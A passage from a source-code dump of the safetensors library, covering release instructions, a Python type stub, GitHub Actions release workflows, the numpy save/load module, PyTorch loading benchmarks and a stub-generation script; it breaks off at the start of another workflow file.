| - Rebase this [PR](https://github.com/huggingface/transformers/pull/16712) 21 | This will run the actual full test suite. 22 | - Check the results. 
23 | - **If any breaking change has been done**, make sure the version can safely be increased for transformers users (`safetensors` version need to make sure users don't upgrade before `transformers` has). [link](https://github.com/huggingface/transformers/blob/main/setup.py#L154) 24 | For instance `safetensors>=0.10,<0.11` so we can safely upgrade to `0.11` without impacting 25 | current users 26 | - Then start a new PR containing all desired code changes from the following steps. 27 | - You will `Create release` after the code modifications are on `master`. 28 | 29 | # Rust 30 | 31 | - `safetensors` (rust, python & node) versions don't have to be in sync but it's 32 | very common to release for all versions at once for new features. 33 | - Edit `Cargo.toml` to reflect new version 34 | - Edit `CHANGELOG.md`: 35 | - Add relevant PRs that were added (python PRs do not belong for instance). 36 | - Add links at the end of the files. 37 | - Go to [Releases](https://github.com/huggingface/safetensors/releases) 38 | - Create new Release: 39 | - Mark it as pre-release 40 | - Use new version name with a new tag (create on publish) `vX.X.X`. 41 | - Copy paste the new part of the `CHANGELOG.md` 42 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading 43 | the new version on `crates.io`, there's no going back after this 44 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. 45 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. 46 | 47 | 48 | # Python 49 | 50 | - Edit `bindings/python/setup.py` to reflect new version. 51 | - Edit `bindings/python/py_src/safetensors/__init__.py` to reflect new version. 52 | - Edit `CHANGELOG.md`: 53 | - Add relevant PRs that were added (node PRs do not belong for instance). 54 | - Add links at the end of the files. 55 | - Go to [Releases](https://github.com/huggingface/safetensors/releases) 56 | - Create new Release: 57 | - Mark it as pre-release 58 | - Use new version name with a new tag (create on publish) `python-vX.X.X`. 59 | - Copy paste the new part of the `CHANGELOG.md` 60 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading 61 | the new version on `pypi`, there's no going back after this 62 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. 63 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. 64 | - This CI/CD has 3 distinct builds, `Pypi`(normal), `conda` and `extra`. `Extra` is REALLY slow (~4h), this is normal since it has to rebuild many things, but enables the wheel to be available for old Linuxes 65 | 66 | # Node 67 | 68 | - Edit `bindings/node/package.json` to reflect new version. 69 | - Edit `CHANGELOG.md`: 70 | - Add relevant PRs that were added (python PRs do not belong for instance). 71 | - Add links at the end of the files. 72 | - Go to [Releases](https://github.com/huggingface/safetensors/releases) 73 | - Create new Release: 74 | - Mark it as pre-release 75 | - Use new version name with a new tag (create on publish) `node-vX.X.X`. 76 | - Copy paste the new part of the `CHANGELOG.md` 77 | - ⚠️ Click on `Publish release`. 
This will start the whole process of building a uploading 78 | the new version on `npm`, there's no going back after this 79 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. 80 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. 81 | 82 | 83 | # Testing the CI/CD for release 84 | 85 | 86 | If you want to make modifications to the CI/CD of the release GH actions, you need 87 | to : 88 | - **Comment the part that uploads the artifacts** to `crates.io`, `PyPi` or `npm`. 89 | - Change the trigger mechanism so it can trigger every time you push to your branch. 90 | - Keep pushing your changes until the artifacts are properly created. 91 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/__init__.pyi: -------------------------------------------------------------------------------- 1 | # Generated content DO NOT EDIT 2 | @staticmethod 3 | def deserialize(bytes): 4 | """ 5 | Opens a safetensors lazily and returns tensors as asked 6 | 7 | Args: 8 | data (`bytes`): 9 | The byte content of a file 10 | 11 | Returns: 12 | (`List[str, Dict[str, Dict[str, any]]]`): 13 | The deserialized content is like: 14 | [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)] 15 | """ 16 | pass 17 | 18 | @staticmethod 19 | def serialize(tensor_dict, metadata=None): 20 | """ 21 | Serializes raw data. 22 | 23 | NOTE: the caller is required to ensure any pointer passed via `data_ptr` is valid and will live 24 | long enough for the duration of the serialization. 25 | We will remove the need for the caller to hold references themselves when we drop support for 26 | python versions prior to 3.11 where the `PyBuffer` API is available. 27 | Creating a `PyBuffer` will enable us to hold a reference to each passed in data array, 28 | increasing its ref count preventing the gc from collecting it while we serialize. 29 | 30 | Args: 31 | tensor_dict (`Dict[str, Dict[Any]]`): 32 | The tensor dict is like: 33 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data_ptr": 1234, "data_len": 24}} 34 | metadata (`Dict[str, str]`, *optional*): 35 | The optional purely text annotations 36 | 37 | Returns: 38 | (`bytes`): 39 | The serialized content. 40 | """ 41 | pass 42 | 43 | @staticmethod 44 | def serialize_file(tensor_dict, filename, metadata=None): 45 | """ 46 | Serializes raw data into file. 47 | 48 | NOTE: the caller is required to ensure any pointer passed via `data_ptr` is valid and will live 49 | long enough for the duration of the serialization. 50 | We will remove the need for the caller to hold references themselves when we drop support for 51 | python versions prior to 3.11 where the `PyBuffer` API is available. 52 | Creating a `PyBuffer` will enable us to hold a reference to each passed in data array, 53 | increasing its ref count preventing the gc from collecting it while we serialize. 54 | 55 | Args: 56 | tensor_dict (`Dict[str, Dict[Any]]`): 57 | The tensor dict is like: 58 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data_ptr": 1234, "data_len": 24}} 59 | filename (`str`, or `os.PathLike`): 60 | The name of the file to write into. 
61 | metadata (`Dict[str, str]`, *optional*): 62 | The optional purely text annotations 63 | 64 | Returns: 65 | (`NoneType`): 66 | On success return None 67 | """ 68 | pass 69 | 70 | class safe_open: 71 | """ 72 | Opens a safetensors lazily and returns tensors as asked 73 | 74 | Args: 75 | filename (`str`, or `os.PathLike`): 76 | The filename to open 77 | 78 | framework (`str`): 79 | The framework you want you tensors in. Supported values: 80 | `pt`, `tf`, `flax`, `numpy`. 81 | 82 | device (`str`, defaults to `"cpu"`): 83 | The device on which you want the tensors. 84 | """ 85 | def __init__(self, filename, framework, device=...): 86 | pass 87 | 88 | def __enter__(self): 89 | """ 90 | Start the context manager 91 | """ 92 | pass 93 | 94 | def __exit__(self, _exc_type, _exc_value, _traceback): 95 | """ 96 | Exits the context manager 97 | """ 98 | pass 99 | 100 | def get_slice(self, name): 101 | """ 102 | Returns a full slice view object 103 | 104 | Args: 105 | name (`str`): 106 | The name of the tensor you want 107 | 108 | Returns: 109 | (`PySafeSlice`): 110 | A dummy object you can slice into to get a real tensor 111 | Example: 112 | ```python 113 | from safetensors import safe_open 114 | 115 | with safe_open("model.safetensors", framework="pt", device=0) as f: 116 | tensor_part = f.get_slice("embedding")[:, ::8] 117 | 118 | ``` 119 | """ 120 | pass 121 | 122 | def get_tensor(self, name): 123 | """ 124 | Returns a full tensor 125 | 126 | Args: 127 | name (`str`): 128 | The name of the tensor you want 129 | 130 | Returns: 131 | (`Tensor`): 132 | The tensor in the framework you opened the file for. 133 | 134 | Example: 135 | ```python 136 | from safetensors import safe_open 137 | 138 | with safe_open("model.safetensors", framework="pt", device=0) as f: 139 | tensor = f.get_tensor("embedding") 140 | 141 | ``` 142 | """ 143 | pass 144 | 145 | def keys(self): 146 | """ 147 | Returns the names of the tensors in the file. 148 | 149 | Returns: 150 | (`List[str]`): 151 | The name of the tensors contained in that file 152 | """ 153 | pass 154 | 155 | def metadata(self): 156 | """ 157 | Return the special non tensor information in the header 158 | 159 | Returns: 160 | (`Dict[str, str]`): 161 | The freeform metadata. 162 | """ 163 | pass 164 | 165 | def offset_keys(self): 166 | """ 167 | Returns the names of the tensors in the file, ordered by offset. 168 | 169 | Returns: 170 | (`List[str]`): 171 | The name of the tensors contained in that file 172 | """ 173 | pass 174 | 175 | class SafetensorError(Exception): 176 | """ 177 | Custom Python Exception for Safetensor errors. 
178 | """ 179 | -------------------------------------------------------------------------------- /.github/workflows/python-release.yml: -------------------------------------------------------------------------------- 1 | # This file is autogenerated by maturin v1.7.4 2 | # To update, run 3 | # 4 | # maturin generate-ci github -m bindings/python/Cargo.toml 5 | # 6 | name: CI 7 | 8 | on: 9 | push: 10 | branches: 11 | - main 12 | - master 13 | tags: 14 | - '*' 15 | pull_request: 16 | workflow_dispatch: 17 | 18 | permissions: 19 | contents: read 20 | 21 | jobs: 22 | linux: 23 | runs-on: ${{ matrix.platform.runner }} 24 | strategy: 25 | matrix: 26 | platform: 27 | - runner: ubuntu-latest 28 | target: x86_64 29 | - runner: ubuntu-latest 30 | target: x86 31 | - runner: ubuntu-latest 32 | target: aarch64 33 | - runner: ubuntu-latest 34 | target: armv7 35 | - runner: ubuntu-latest 36 | target: s390x 37 | - runner: ubuntu-latest 38 | target: ppc64le 39 | steps: 40 | - uses: actions/checkout@v6 41 | - uses: actions/setup-python@v6 42 | with: 43 | python-version: 3.x 44 | - name: Build wheels 45 | uses: PyO3/maturin-action@v1 46 | with: 47 | target: ${{ matrix.platform.target }} 48 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 49 | sccache: 'true' 50 | manylinux: auto 51 | - name: Upload wheels 52 | uses: actions/upload-artifact@v6 53 | with: 54 | name: wheels-linux-${{ matrix.platform.target }} 55 | path: dist 56 | 57 | musllinux: 58 | runs-on: ${{ matrix.platform.runner }} 59 | strategy: 60 | matrix: 61 | platform: 62 | - runner: ubuntu-latest 63 | target: x86_64 64 | - runner: ubuntu-latest 65 | target: x86 66 | - runner: ubuntu-latest 67 | target: aarch64 68 | - runner: ubuntu-latest 69 | target: armv7 70 | steps: 71 | - uses: actions/checkout@v6 72 | - uses: actions/setup-python@v6 73 | with: 74 | python-version: 3.x 75 | - name: Build wheels 76 | uses: PyO3/maturin-action@v1 77 | with: 78 | target: ${{ matrix.platform.target }} 79 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 80 | sccache: 'true' 81 | manylinux: musllinux_1_2 82 | - name: Upload wheels 83 | uses: actions/upload-artifact@v6 84 | with: 85 | name: wheels-musllinux-${{ matrix.platform.target }} 86 | path: dist 87 | 88 | windows: 89 | runs-on: ${{ matrix.platform.runner }} 90 | strategy: 91 | matrix: 92 | platform: 93 | - runner: windows-latest 94 | target: x64 95 | - runner: windows-latest 96 | target: x86 97 | - runner: windows-11-arm 98 | target: arm64 99 | steps: 100 | - uses: actions/checkout@v6 101 | - uses: actions/setup-python@v6 102 | with: 103 | python-version: 3.x 104 | architecture: ${{ matrix.platform.target }} 105 | - name: Build wheels 106 | uses: PyO3/maturin-action@v1 107 | with: 108 | target: ${{ matrix.platform.target == 'arm64' && 'aarch64-pc-windows-msvc' || matrix.platform.target }} 109 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 110 | sccache: 'true' 111 | - name: Upload wheels 112 | uses: actions/upload-artifact@v6 113 | with: 114 | name: wheels-windows-${{ matrix.platform.target }} 115 | path: dist 116 | 117 | macos: 118 | runs-on: ${{ matrix.platform.runner }} 119 | strategy: 120 | matrix: 121 | platform: 122 | - runner: macos-15-intel 123 | target: x86_64 124 | - runner: macos-14 125 | target: aarch64 126 | steps: 127 | - uses: actions/checkout@v6 128 | - uses: actions/setup-python@v6 129 | with: 130 | python-version: 3.x 131 | - name: Build wheels 132 | uses: PyO3/maturin-action@v1 133 | with: 134 | target: ${{ 
matrix.platform.target }} 135 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 136 | sccache: 'true' 137 | - name: Upload wheels 138 | uses: actions/upload-artifact@v6 139 | with: 140 | name: wheels-macos-${{ matrix.platform.target }} 141 | path: dist 142 | 143 | sdist: 144 | runs-on: ubuntu-latest 145 | steps: 146 | - uses: actions/checkout@v6 147 | - name: Build sdist 148 | uses: PyO3/maturin-action@v1 149 | with: 150 | command: sdist 151 | args: --out dist --manifest-path bindings/python/Cargo.toml 152 | - name: Upload sdist 153 | uses: actions/upload-artifact@v6 154 | with: 155 | name: wheels-sdist 156 | path: dist 157 | 158 | release: 159 | name: Release 160 | runs-on: ubuntu-latest 161 | if: ${{ startsWith(github.ref, 'refs/tags/') || github.event_name == 'workflow_dispatch' }} 162 | needs: [linux, musllinux, windows, macos, sdist] 163 | permissions: 164 | # Use to sign the release artifacts 165 | id-token: write 166 | # Used to upload release artifacts 167 | contents: write 168 | # Used to generate artifact attestation 169 | attestations: write 170 | steps: 171 | - uses: actions/download-artifact@v7 172 | - name: Generate artifact attestation 173 | uses: actions/attest-build-provenance@v3 174 | with: 175 | subject-path: 'wheels-*/*' 176 | - name: Publish to PyPI 177 | if: "startsWith(github.ref, 'refs/tags/')" 178 | uses: PyO3/maturin-action@v1 179 | env: 180 | MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN_DIST}} 181 | with: 182 | command: upload 183 | args: --non-interactive --skip-existing wheels-*/* 184 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/numpy.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | from typing import Dict, List, Optional, Union 4 | 5 | import numpy as np 6 | 7 | from safetensors import deserialize, safe_open, serialize, serialize_file 8 | 9 | 10 | def _flatten( 11 | tensor_dict: Dict[str, np.ndarray], keep_alive_buffer: List 12 | ) -> Dict[str, Dict]: 13 | flattened = {} 14 | for k, v in tensor_dict.items(): 15 | tensor = v 16 | if not _is_little_endian(tensor): 17 | tensor = tensor.byteswap(inplace=False) 18 | keep_alive_buffer.append(tensor) 19 | flattened[k] = { 20 | "dtype": tensor.dtype.name, 21 | "shape": tensor.shape, 22 | "data_ptr": tensor.ctypes.data, 23 | "data_len": tensor.nbytes, 24 | } 25 | return flattened 26 | 27 | 28 | def save( 29 | tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]] = None 30 | ) -> bytes: 31 | """ 32 | Saves a dictionary of tensors into raw bytes in safetensors format. 33 | 34 | Args: 35 | tensor_dict (`Dict[str, np.ndarray]`): 36 | The incoming tensors. Tensors need to be contiguous and dense. 37 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 38 | Optional text only metadata you might want to save in your header. 39 | For instance it can be useful to specify more about the underlying 40 | tensors. This is purely informative and does not affect tensor loading. 
41 | 42 | Returns: 43 | `bytes`: The raw bytes representing the format 44 | 45 | Example: 46 | 47 | ```python 48 | from safetensors.numpy import save 49 | import numpy as np 50 | 51 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} 52 | byte_data = save(tensors) 53 | ``` 54 | """ 55 | keep_alive_buffer = [] # to keep byteswapped tensors alive 56 | serialized = serialize(_flatten(tensor_dict, keep_alive_buffer), metadata=metadata) 57 | result = bytes(serialized) 58 | return result 59 | 60 | 61 | def save_file( 62 | tensor_dict: Dict[str, np.ndarray], 63 | filename: Union[str, os.PathLike], 64 | metadata: Optional[Dict[str, str]] = None, 65 | ) -> None: 66 | """ 67 | Saves a dictionary of tensors into raw bytes in safetensors format. 68 | 69 | Args: 70 | tensor_dict (`Dict[str, np.ndarray]`): 71 | The incoming tensors. Tensors need to be contiguous and dense. 72 | filename (`str`, or `os.PathLike`)): 73 | The filename we're saving into. 74 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 75 | Optional text only metadata you might want to save in your header. 76 | For instance it can be useful to specify more about the underlying 77 | tensors. This is purely informative and does not affect tensor loading. 78 | 79 | Returns: 80 | `None` 81 | 82 | Example: 83 | 84 | ```python 85 | from safetensors.numpy import save_file 86 | import numpy as np 87 | 88 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} 89 | save_file(tensors, "model.safetensors") 90 | ``` 91 | """ 92 | keep_alive_buffer = [] # to keep byteswapped tensors alive 93 | serialize_file( 94 | _flatten(tensor_dict, keep_alive_buffer), filename, metadata=metadata 95 | ) 96 | 97 | 98 | def load(data: bytes) -> Dict[str, np.ndarray]: 99 | """ 100 | Loads a safetensors file into numpy format from pure bytes. 101 | 102 | Args: 103 | data (`bytes`): 104 | The content of a safetensors file 105 | 106 | Returns: 107 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` on cpu 108 | 109 | Example: 110 | 111 | ```python 112 | from safetensors.numpy import load 113 | 114 | file_path = "./my_folder/bert.safetensors" 115 | with open(file_path, "rb") as f: 116 | data = f.read() 117 | 118 | loaded = load(data) 119 | ``` 120 | """ 121 | flat = deserialize(data) 122 | return _view2np(flat) 123 | 124 | 125 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]: 126 | """ 127 | Loads a safetensors file into numpy format. 
128 | 129 | Args: 130 | filename (`str`, or `os.PathLike`)): 131 | The name of the file which contains the tensors 132 | 133 | Returns: 134 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` 135 | 136 | Example: 137 | 138 | ```python 139 | from safetensors.numpy import load_file 140 | 141 | file_path = "./my_folder/bert.safetensors" 142 | loaded = load_file(file_path) 143 | ``` 144 | """ 145 | result = {} 146 | with safe_open(filename, framework="np") as f: 147 | for k in f.offset_keys(): 148 | result[k] = f.get_tensor(k) 149 | return result 150 | 151 | 152 | _TYPES = { 153 | "F64": np.float64, 154 | "F32": np.float32, 155 | "F16": np.float16, 156 | "I64": np.int64, 157 | "U64": np.uint64, 158 | "I32": np.int32, 159 | "U32": np.uint32, 160 | "I16": np.int16, 161 | "U16": np.uint16, 162 | "I8": np.int8, 163 | "U8": np.uint8, 164 | "BOOL": bool, 165 | "C64": np.complex64, 166 | } 167 | 168 | 169 | def _getdtype(dtype_str: str) -> np.dtype: 170 | return _TYPES[dtype_str] 171 | 172 | 173 | def _view2np(safeview) -> Dict[str, np.ndarray]: 174 | result = {} 175 | for k, v in safeview: 176 | dtype = _getdtype(v["dtype"]) 177 | arr = np.frombuffer(v["data"], dtype=dtype).reshape(v["shape"]) 178 | result[k] = arr 179 | return result 180 | 181 | 182 | def _is_little_endian(tensor: np.ndarray) -> bool: 183 | byteorder = tensor.dtype.byteorder 184 | if byteorder == "=": 185 | if sys.byteorder == "little": 186 | return True 187 | else: 188 | return False 189 | elif byteorder == "|": 190 | return True 191 | elif byteorder == "<": 192 | return True 193 | elif byteorder == ">": 194 | return False 195 | raise ValueError(f"Unexpected byte order {byteorder}") 196 | -------------------------------------------------------------------------------- /bindings/python/benches/test_pt.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import pytest 5 | import torch 6 | 7 | from safetensors.torch import load_file, save_file 8 | 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = torch.zeros((50257, 768)) 13 | tensors["wpe"] = torch.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = torch.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = torch.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = torch.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = torch.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = torch.zeros((2304)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = torch.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = torch.zeros((768)) 22 | tensors[f"h.{i}.ln_2.weight"] = torch.zeros((768)) 23 | tensors[f"h.{i}.ln_2.bias"] = torch.zeros((768)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = torch.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = torch.zeros((3072)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = torch.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = torch.zeros((768)) 28 | tensors["ln_f.weight"] = torch.zeros((768)) 29 | tensors["ln_f.bias"] = torch.zeros((768)) 30 | return tensors 31 | 32 | 33 | def create_lora(n_layers: int): 34 | tensors = {} 35 | for i in range(n_layers): 36 | tensors[f"lora.{i}.up.weight"] = torch.zeros((32, 32)) 37 | tensors[f"lora.{i}.down.weight"] = torch.zeros((32, 32)) 38 | return tensors 39 | 40 | 41 | def test_pt_pt_load_cpu(benchmark): 42 | # benchmark something 43 | weights = create_gpt2(12) 44 | with tempfile.NamedTemporaryFile(delete=False) as f: 
45 | torch.save(weights, f) 46 | result = benchmark(torch.load, f.name) 47 | os.unlink(f.name) 48 | 49 | for k, v in weights.items(): 50 | tv = result[k] 51 | assert torch.allclose(v, tv) 52 | 53 | 54 | def test_pt_sf_load_cpu(benchmark): 55 | # benchmark something 56 | weights = create_gpt2(12) 57 | with tempfile.NamedTemporaryFile(delete=False) as f: 58 | save_file(weights, f.name) 59 | result = benchmark(load_file, f.name) 60 | os.unlink(f.name) 61 | 62 | for k, v in weights.items(): 63 | tv = result[k] 64 | assert torch.allclose(v, tv) 65 | 66 | 67 | def test_pt_pt_load_cpu_small(benchmark): 68 | weights = create_lora(500) 69 | with tempfile.NamedTemporaryFile(delete=False) as f: 70 | torch.save(weights, f) 71 | result = benchmark(torch.load, f.name) 72 | os.unlink(f.name) 73 | 74 | for k, v in weights.items(): 75 | tv = result[k] 76 | assert torch.allclose(v, tv) 77 | 78 | 79 | def test_pt_sf_load_cpu_small(benchmark): 80 | weights = create_lora(500) 81 | 82 | with tempfile.NamedTemporaryFile(delete=False) as f: 83 | save_file(weights, f.name) 84 | result = benchmark(load_file, f.name) 85 | os.unlink(f.name) 86 | 87 | for k, v in weights.items(): 88 | tv = result[k] 89 | assert torch.allclose(v, tv) 90 | 91 | 92 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") 93 | def test_pt_pt_load_gpu(benchmark): 94 | # benchmark something 95 | weights = create_gpt2(12) 96 | with tempfile.NamedTemporaryFile(delete=False) as f: 97 | torch.save(weights, f) 98 | result = benchmark(torch.load, f.name, map_location="cuda:0") 99 | os.unlink(f.name) 100 | 101 | for k, v in weights.items(): 102 | v = v.cuda() 103 | tv = result[k] 104 | assert torch.allclose(v, tv) 105 | 106 | 107 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") 108 | def test_pt_sf_load_gpu(benchmark): 109 | # benchmark something 110 | weights = create_gpt2(12) 111 | with tempfile.NamedTemporaryFile(delete=False) as f: 112 | save_file(weights, f.name) 113 | result = benchmark(load_file, f.name, device="cuda:0") 114 | os.unlink(f.name) 115 | 116 | for k, v in weights.items(): 117 | v = v.cuda() 118 | tv = result[k] 119 | assert torch.allclose(v, tv) 120 | 121 | 122 | @pytest.mark.skipif( 123 | not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), 124 | reason="requires mps", 125 | ) 126 | def test_pt_pt_load_mps(benchmark): 127 | # benchmark something 128 | weights = create_gpt2(12) 129 | with tempfile.NamedTemporaryFile(delete=False) as f: 130 | torch.save(weights, f) 131 | result = benchmark(torch.load, f.name, map_location="mps") 132 | os.unlink(f.name) 133 | 134 | for k, v in weights.items(): 135 | v = v.to(device="mps") 136 | tv = result[k] 137 | assert torch.allclose(v, tv) 138 | 139 | 140 | @pytest.mark.skipif( 141 | not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), 142 | reason="requires mps", 143 | ) 144 | def test_pt_sf_load_mps(benchmark): 145 | # benchmark something 146 | weights = create_gpt2(12) 147 | with tempfile.NamedTemporaryFile(delete=False) as f: 148 | save_file(weights, f.name) 149 | result = benchmark(load_file, f.name, device="mps") 150 | os.unlink(f.name) 151 | 152 | for k, v in weights.items(): 153 | v = v.to(device="mps") 154 | tv = result[k] 155 | assert torch.allclose(v, tv) 156 | 157 | 158 | def test_pt_sf_save_cpu(benchmark): 159 | weights = create_gpt2(12) 160 | 161 | filename = "tmp.safetensors" 162 | 163 | # XXX: On some platforms (tested on Linux x86_64 ext4), writing to an already existing file is 
slower than creating a new one. 164 | # On others, such as MacOS (APFS), it's the opposite. To have more consistent benchmarks, 165 | # we ensure the file does not exist before each write, which is also closer to real world usage. 166 | def setup(): 167 | try: 168 | os.unlink(filename) 169 | except Exception: 170 | pass 171 | 172 | benchmark.pedantic( 173 | save_file, args=(weights, filename), setup=setup, iterations=1, rounds=5 174 | ) 175 | 176 | # Clean up files 177 | os.unlink(filename) 178 | -------------------------------------------------------------------------------- /bindings/python/stub.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import inspect 3 | import os 4 | import subprocess 5 | import tempfile 6 | 7 | INDENT = " " * 4 8 | GENERATED_COMMENT = "# Generated content DO NOT EDIT\n" 9 | 10 | 11 | def do_indent(text: str, indent: str): 12 | return text.replace("\n", f"\n{indent}") 13 | 14 | 15 | def function(obj, indent, text_signature=None): 16 | if text_signature is None: 17 | text_signature = obj.__text_signature__ 18 | string = "" 19 | string += f"{indent}def {obj.__name__}{text_signature}:\n" 20 | indent += INDENT 21 | string += f'{indent}"""\n' 22 | string += f"{indent}{do_indent(obj.__doc__, indent)}\n" 23 | string += f'{indent}"""\n' 24 | string += f"{indent}pass\n" 25 | string += "\n" 26 | string += "\n" 27 | return string 28 | 29 | 30 | def member_sort(member): 31 | if inspect.isclass(member): 32 | value = 10 + len(inspect.getmro(member)) 33 | else: 34 | value = 1 35 | return value 36 | 37 | 38 | def fn_predicate(obj): 39 | value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj) 40 | if value: 41 | return ( 42 | obj.__doc__ 43 | and obj.__text_signature__ 44 | and ( 45 | not obj.__name__.startswith("_") 46 | or obj.__name__ in {"__enter__", "__exit__"} 47 | ) 48 | ) 49 | if inspect.isgetsetdescriptor(obj): 50 | return obj.__doc__ and not obj.__name__.startswith("_") 51 | return False 52 | 53 | 54 | def get_module_members(module): 55 | members = [ 56 | member 57 | for name, member in inspect.getmembers(module) 58 | if not name.startswith("_") and not inspect.ismodule(member) 59 | ] 60 | members.sort(key=member_sort) 61 | return members 62 | 63 | 64 | def pyi_file(obj, indent=""): 65 | string = "" 66 | if inspect.ismodule(obj): 67 | string += GENERATED_COMMENT 68 | members = get_module_members(obj) 69 | for member in members: 70 | string += pyi_file(member, indent) 71 | 72 | elif inspect.isclass(obj): 73 | indent += INDENT 74 | mro = inspect.getmro(obj) 75 | if len(mro) > 2: 76 | inherit = f"({mro[1].__name__})" 77 | else: 78 | inherit = "" 79 | string += f"class {obj.__name__}{inherit}:\n" 80 | 81 | body = "" 82 | if obj.__doc__: 83 | body += ( 84 | f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n' 85 | ) 86 | 87 | fns = inspect.getmembers(obj, fn_predicate) 88 | 89 | # Init 90 | if obj.__text_signature__: 91 | signature = obj.__text_signature__.replace("(", "(self, ") 92 | body += f"{indent}def __init__{signature}:\n" 93 | body += f"{indent + INDENT}pass\n" 94 | body += "\n" 95 | 96 | for name, fn in fns: 97 | body += pyi_file(fn, indent=indent) 98 | 99 | if not body: 100 | body += f"{indent}pass\n" 101 | 102 | string += body 103 | string += "\n\n" 104 | 105 | elif inspect.isbuiltin(obj): 106 | string += f"{indent}@staticmethod\n" 107 | string += function(obj, indent) 108 | 109 | elif inspect.ismethoddescriptor(obj): 110 | string += function(obj, indent) 111 | 112 | elif 
inspect.isgetsetdescriptor(obj): 113 | # TODO it would be interesing to add the setter maybe ? 114 | string += f"{indent}@property\n" 115 | string += function(obj, indent, text_signature="(self)") 116 | else: 117 | raise Exception(f"Object {obj} is not supported") 118 | return string 119 | 120 | 121 | def py_file(module, origin): 122 | members = get_module_members(module) 123 | 124 | string = GENERATED_COMMENT 125 | string += f"from .. import {origin}\n" 126 | string += "\n" 127 | for member in members: 128 | name = member.__name__ 129 | string += f"{name} = {origin}.{name}\n" 130 | return string 131 | 132 | 133 | def do_black(content): 134 | content = content.replace("$self", "self") 135 | with tempfile.NamedTemporaryFile(mode="w+", suffix=".pyi") as f: 136 | f.write(content) 137 | f.flush() 138 | _ = subprocess.check_output(["ruff", "format", f.name]) 139 | f.seek(0) 140 | new_content = f.read() 141 | return new_content 142 | 143 | 144 | def write(module, directory, origin, check=False): 145 | submodules = [ 146 | (name, member) 147 | for name, member in inspect.getmembers(module) 148 | if inspect.ismodule(member) 149 | ] 150 | 151 | filename = os.path.join(directory, "__init__.pyi") 152 | pyi_content = pyi_file(module) 153 | pyi_content = do_black(pyi_content) 154 | os.makedirs(directory, exist_ok=True) 155 | if check: 156 | with open(filename, "r") as f: 157 | data = f.read() 158 | assert data == pyi_content, ( 159 | f"The content of {filename} seems outdated, please run `python stub.py`" 160 | ) 161 | else: 162 | with open(filename, "w") as f: 163 | f.write(pyi_content) 164 | 165 | filename = os.path.join(directory, "__init__.py") 166 | py_content = py_file(module, origin) 167 | py_content = do_black(py_content) 168 | os.makedirs(directory, exist_ok=True) 169 | 170 | is_auto = False 171 | if not os.path.exists(filename): 172 | is_auto = True 173 | else: 174 | with open(filename, "r") as f: 175 | line = f.readline() 176 | if line == GENERATED_COMMENT: 177 | is_auto = True 178 | 179 | if is_auto: 180 | if check: 181 | with open(filename, "r") as f: 182 | data = f.read() 183 | assert data == py_content, ( 184 | f"The content of {filename} seems outdated, please run `python stub.py`" 185 | ) 186 | else: 187 | with open(filename, "w") as f: 188 | f.write(py_content) 189 | 190 | for name, submodule in submodules: 191 | write(submodule, os.path.join(directory, name), f"{name}", check=check) 192 | 193 | 194 | if __name__ == "__main__": 195 | parser = argparse.ArgumentParser() 196 | parser.add_argument("--check", action="store_true") 197 | 198 | args = parser.parse_args() 199 | import safetensors 200 | 201 | write( 202 | safetensors._safetensors_rust, 203 | "py_src/safetensors/", 204 | "safetensors", 205 | check=args.check, 206 | ) 207 | -------------------------------------------------------------------------------- /.github/workflows/python.yml: -------------------------------------------------------------------------------- 1 | name: Python 2 | 3 | on: 4 | pull_request: 5 | 6 | jobs: 7 | build_and_test: 8 | name: Check everything builds & tests 9 | runs-on: ${{ matrix.os }} 10 | strategy: 11 | 